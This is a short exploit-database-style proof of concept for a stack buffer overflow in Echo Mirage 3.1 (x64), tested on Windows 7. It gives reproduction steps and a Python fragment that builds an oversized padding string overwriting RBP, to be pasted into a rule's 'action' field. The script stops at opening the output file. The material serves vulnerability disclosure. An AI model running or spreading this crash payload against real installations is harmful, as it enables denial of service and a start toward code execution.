# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
# Date: 21-01-2019
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
# Version: 3.1 (x64)
# Exploit Author: InitD Community
# Contact: https://twitter.com/initd_sh
# Website: http://initd.sh/
# Tested on: Windows 7
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Pastein "action" field. --> BOoo0m.
Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
This Bug Identified by Touhid M.Shaikh
buffer = "A"*24241
RBP = "B"*8
PAD = "C"*50
evil = buffer + RBP + PAD
evil_file = open("Echo-Mirage-BoF-POC.txt","w")